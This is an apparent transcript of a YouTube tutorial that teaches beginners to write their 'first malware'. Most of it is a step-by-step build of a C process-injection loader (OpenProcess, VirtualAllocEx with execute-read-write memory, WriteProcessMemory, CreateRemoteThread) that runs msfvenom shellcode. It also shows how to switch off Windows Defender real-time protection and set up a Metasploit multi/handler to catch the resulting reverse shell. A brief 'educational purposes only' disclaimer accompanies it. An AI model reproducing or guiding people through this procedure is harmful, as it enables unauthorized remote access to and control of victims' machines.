by the end of this video you will write your first malware and will have enough knowledge to go and explore malware development on your own okay let's start with what you need to know cuz when I wanted to write my first malware I was like what do I need is KN C enough cuz yeah you kind of need to know see and uh well yes this is enough you will learn all the other stuff along the way if you ask me doing projects is the best way to learn and not because you actually get to build stuff and not just read about it it's because you will find a ton of bugs along the way that you will learn to fix and in general you will stumble upon a lot of knowledge that is not necessarily related to Mal development but will be very useful in your cyber security Journey but keep in mind that this video is for educational purposes only so if you intend to do any harm with software you will write or even prank your friend uh don't do that turn off the video it's not for you but you still need resources to learn from so I'm going to give you all that right now first you want to visit google.com and no this is not a joke let me show you for starters you want to ask a question like what types of malware are there this time I'm going to answer this question for you well at least partially cuz as you can see to cover all of these types this video would have to be like an hour long starting with ransomware which is probably the most destructive malware out there it usually extorts and encrypts data inside the company Network Ransom operator the person behind the malware is then asking for money in exchange for decryption key if victim doesn't agree to pay operator will most likely publish all the sensitive information they gathered then we have info Stealers and the name is pretty self-explanatory they are used to steal information credentials for example they are also a plague and are very likely to come in bundle with other malare last one I'm going to mention is botnet which by itself it's a network of zombie computers a special malware is traveling through hundreds of thousands or even Millions machines infecting them it talks with a command and control server and does whatever it is told to do now pick one that seems cool to you I think I've started with a simple run someware or a stealer but for both of them actually I have videos on my YouTube channel so check them out Link in the description let's say you want to go with ransomware research again what is ransomware how ransomware Works what is encryption what types of encryption out there what types of encryption are used by ransomware what are the biggest ransomware groups how to reverse engineer a ransomware or maybe watch a reverse engineering videos of some popular ransomware so you know how they look inside how they are buil okay so I've done like maybe 2 minutes of Google searches and I already came across all these articles and YouTube videos this one for example teaches you about common encryption algorithms and this one shows you uh how to use hybrid encryption scheme which is a combination of as and RSA this is what I'm talking in my ransomware video again check it out uh Link in the description and uh this guy even provides code Snippets for you so this is super detailed you have external links so like I know seven maybe or something I didn't count it more articles you can read uh reverse engineering one I cry one cry is one of the most uh maybe popular if I I think I can say this ransomers I also done a video about reverse engineering one cry but this is an article that describes it so you can see how the ransomware looks inside the sort of uh more reverse engineering articles and more reverse engineering articles how ransomware works you have article here describing uh some statistics examples of uh different ransomware uh groups you can research them uh you have all these YouTube videos about reverse engineering ransomware and from a lot of great content creators so knowledge is there the key is to learn how to do a proper research that's that's what I want you primarily to get from this video now I want to show you this website called VX underground this is the biggest collection of malware samples on the internet but not only malware samples they also have this folder called papers if you click there you can see articles about malware development malware uh analysis and pretty much everything related to malware let's go to Windows catalog and here you can uh see all the categories for example persistance open persistance catalog and you see all of these articles 36 Files about how to make malware persistant and different techniques uh involving persistance so you have plenty of knowledge here from the most beginner friendly stuff to the super advanced stuff that I don't I'm not even touching cuz it's uh it's far it's far Out Of Reach for me right now in the future maybe we'll see you also need to have some knowledge about how Windows works or whatever as you are targeting uh again plenty resources online just Google something like Windows internals uh although there is this one book that I can recommend it is called Windows internals part one it is very detailed and describes pretty much everything you will ever need in terms of how Windows is built and I almost forgot to mention that I have a fresh series on my Channel about Windows internals so definitely go check it out Link in the description okay so once you know what you want to build next thing is to learn how to do it for Windows malware the most essential library is windows. H it gives you access to Windows API functions which allows you to communicate with Windows operating system there is this amazing website called msdn or Microsoft documentation almost every function in Windows API is present there and well documented so that it is easy to use them but in the beginning of this video I promise that you will build your first malware to today and I'm going to keep this promise so open up visual studio and let's write some code our malware will use a technique called process injection to execute a malicious payload inside another process so to do that we need a malicious payload first we'll generate it with msf Venom command inside K Linux copy this from the description of the video hit enter wait couple seconds and you will be greeted with this Shell Code so copy it go to visual studio and paste it into the main function uh let's me to to maybe payload like this all right now what we're going to what we're going to do next using the uh using the functions from windows. H Library as I talked uh talked earlier okay maybe maybe not maybe first uh let's uh create a variable called p p ID that will hold a process ID if you don't know how processes work uh I have a video about them on my channel so go check it out before proceeding before going further we want to get a process ID uh to the Target process basically an idea of the target process so we will be able to specify just for our debugging purposes which uh which process we want to Target now we want to get a handle to this process we will use uh an open process uh function we want to have all access to this process so we specify process all access as the first parameter second parameter false and last parameter is p ID which is our process ID okay so let's add a simple if statement if H process is equal to null we want to print an error let's say error open process something like this return one uh all right so next thing is LP void buffer we want to allocate some memory inside this process uh so that we can later copy this Shell Code uh to this memory so we're going to use Virtual allocate ex function for this first parameter is going to be uh handle to our process then we specify null we we pass null here then we pass size of our payload + one + one then we specify allocation type you want to specify here M Reserve uh M reserve and M commit M Reser and M commit and Page execute R write and now what does it even mean M Reserve means that we are reserving a range of virtual addresses inside the the memory of this process and M commit means that we are assigning these virtual addresses to a physical addresses okay this whole mapping thing uh is going on when we uh when we Type M commit here uh we are committing this uh this memory uh this virtual region that we that we reserved before uh basically uh you need to know the concept of virtual memory for this uh I don't want to get into that in this video there are plenty tutorials on YouTube for this just type virtual memory and you will have a bunch of people people explaining how this works maybe I will be maybe I will make a video video about uh about it someday uh I don't know I have a video about processes uh and process internals right now you are also welcome to to check it out uh but yeah that's how it's basically in a very short very short explanation of how does uh this work and Page execute R write is uh here because we want to be able to execute uh a code that is inside this memory so again a simple if statement if buffer is equal to null let's print F printf uh what error virtual uh virtual alog ex like this and return one all right so once we have this uh once we have allocated uh some memory we want to then write to this memory with a write process memory function it takes H process as first parameter then it takes our buffer that we just allocated then it takes payload which is what we want to write uh inside this buffer then size of the payload payload uh size of this payload and uh and what and null as the last parameter by the way if you uh have uh any problems with these parameters you are not sure if you understand them Let's uh let's say you don't understand the right process memory function right what do you do you open a new tab you type Microsoft documentation let's say this write process memory search for it here it is well documented every parameter described with uh with values that can be specified even with some examples uh so yeah basically everything is there you just need to Google it and that's once again that's the main uh point of this video basically to show you that uh that you just need to do research that's the without without research without ability to search for information you won't learn anything uh D process memory like this okay so uh return one so this again uh we rub this right process memory function into this if statement so that we know if this uh if this was successful or not of course a real malware wouldn't have this but uh it's just a good per uh good uh good thing to do once uh while you are while you are developing your your code your program while while you are writing code basically uh it's easier to debug uh possible problems uh now handle H Fred we are going to now create a function that we actually write this code create remote Fred H process null0 LP Fred start routine LP fret start routine in buffer and last parameter is null uh okay wait not last but uh yeah null here zero here null here once again this is your first malware so you probably have no idea what this mean so what do you do I'm going to keep repeating this you open the new tab you paste this function you see the first link that comes up this is the Microsoft documentation once again and you have all of this described of course uh you are welcome to ask me questions in the comments or add me on Discord and there we can talk I will uh help you with any problems you you have with this code uh but basically this should answer all your questions and if you are not sure uh then then ask me again next next thing would be to write an if statement again if this H Fred function uh if this H Fred handle is not null then you want to print have this error message that something went wrong error create remote thread okay and return one uh printf I misspelled it and the last is wait for single object we don't want our code to uh just finish working we want it to stay uh we want to to we want it to um stay present we don't want it to finish the its own process because we need it running basically because this is a reversal I think I forgot to mention it in the beginning this is going to give us a remote uh access to to the machine that you run this code on of course it will not bypass any antivirus so uh don't expect it to work out of the box you will need to disable Windows Defender which I'm going to do right now let me uh quickly do that you go to you go here you go to manage settings and realtime protection off okay you saw a black screen for a second but that's that's all right now let's go back to uh let's go back to K Linux cuz we are finally ready to test it to do that you want to open msf console this time msf console uh wait a second for it to to load now type wait can I zoom it in a little bit I can use multi multi Handler options you have all these options and you actually should have more uh let me copy these payload that we used CU you need to specify the uh specify the payload first uh you you're going to do it like this uh set payload to this wait uh this ter my terminal broke but that's but that's okay options one more time uh what do we need we need the L host so set L host uh 1 192 1680 13 this is the IP of uh K Linux so uh yeah type just here type this IP if you don't know what is IP of your machine of your K Machine just type uh just type what I have config right am I right yes I have config and one of these interfaces will be correct depending on your network configuration of course but I'm sure you will figure it out uh what else do we need to what else do we need to set up exit Funk set exit fun to Fred like this and we should be good to go so now run and it will listen for incoming connections go back to visual studio uh we should be able to run it with no errors yes it build it successfully okay it asks us for p ID so let me open up a notepad and a process hacker to determine the PID of notepad of course you can do it with task manager but I just oh very nice P actually 404 very nice so 404 and press enter and and as you can see it is hanging it is not closing our application it is actually right here on wait for single object and if you go back to cinux you have this interpreter session you can type shell who am I Utopia Amy this is my PC name and username so congratulations you did it you wrote your first malware I hope you are following along and uh if you didn't then this code this uh in my GitHub Link in the description and uh yeah congrats from this you can only go forward with your journey thanks for sticking to the end if you have any questions write them down in the comments and if you enjoyed the video leave a like subscribe and see you soon [Music] [Music]